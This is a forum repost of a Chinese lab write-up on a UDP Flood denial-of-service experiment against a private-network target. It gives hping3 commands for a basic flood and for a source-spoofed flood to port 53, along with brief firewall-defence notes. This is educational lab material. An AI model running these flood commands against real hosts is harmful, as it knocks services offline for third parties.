返回首页
DA系统
C#IDE
文件同步服务
屏保
今天是: 2026-05-05 "立夏" 夏季的第一个节气,表示盛夏时节的正式开始
收藏
任务
排行
道具
勋章
站长QQ
QQ:979119776
如您使用论坛过程中发现任何问题
请点击下方添加站长QQ
联系站长
休闲区
BBS
技术区
C#IDE
文件同步服务
喝茶淡饭
音乐区
视频区
Linux技术交流
Unity 3D、C#技术交流
Windows技术交流
论坛BUG专区
玩家杂谈
BUG专区
建议专区
搜索
搜索
热搜:
linux
技术
Hi~
登录
或
注册
本版
帖子
用户
DA 论坛
»
休闲区
›
技术区
›
Linux技术交流
›
【转载】『网络协议攻防实验』UDP Flood攻击 ...
返回列表
发新帖
查看:
1645
|
回复:
0
[转载]
【转载】『网络协议攻防实验』UDP Flood攻击
[复制链接]
da11
da11
当前离线
积分
68575
发表于 2022-6-14 10:14:20
|
显示全部楼层
|
阅读模式
『网络协议攻防实验』UDP Flood攻击
转载地址:
https://blog.csdn.net/Xxy605/article/details/119186180
前言
靶机:seedubuntu 12.01,IP:192.168.199.138
攻击机:Kali-2020.4,IP:192.168.199.129
工具:hping3
原理
由于UDP协议的无状态不可靠的天然特性,UDP Flood拒绝服务攻击的原理非常简单,即通过向目标主机和网络发送大量的UDP数据包,造成目标主机显著的计算负载提升,或者目标网络的网络拥塞,从而使得目标主机和网络陷入不可用的状态,造成拒绝服务攻击。
UDP Flood攻击
在靶机上开启tcpdump监听
tcpdump -i eth0 udp -n
在攻击机中向靶机发起udp flood攻击
hping3 --udp -p 53 192.168.199.138
然后在靶机中就能看到连接了
攻击进一步升级,使用工具自带的随机源地址参数进行源地址欺骗udp flood攻击:
hping3 --udp -p 53 --flood --rand-source 192.168.199.138
对UDP Flood攻击的防御
UDP是无状态连接协议,常用于僵尸网络的DDOS攻击,比起TCP来说更难防御。通过设置防火墙,对UDP包的IP,端口,速率可针对性防御。另外,UDP Flood除了消耗受害者资源,也会消耗大量攻击者资源。
完
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有帐号?
注册成为修仙之旅的少年~
x
回复
使用道具
举报
置顶卡
沉默卡
变色卡
返回列表
发新帖
游客
回复
*
滑块验证:
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册成为修仙之旅的少年~
发表回复
浏览过的版块
Web页面设计专区
Unity 3D、C#技术交流
快速回复
返回顶部
返回列表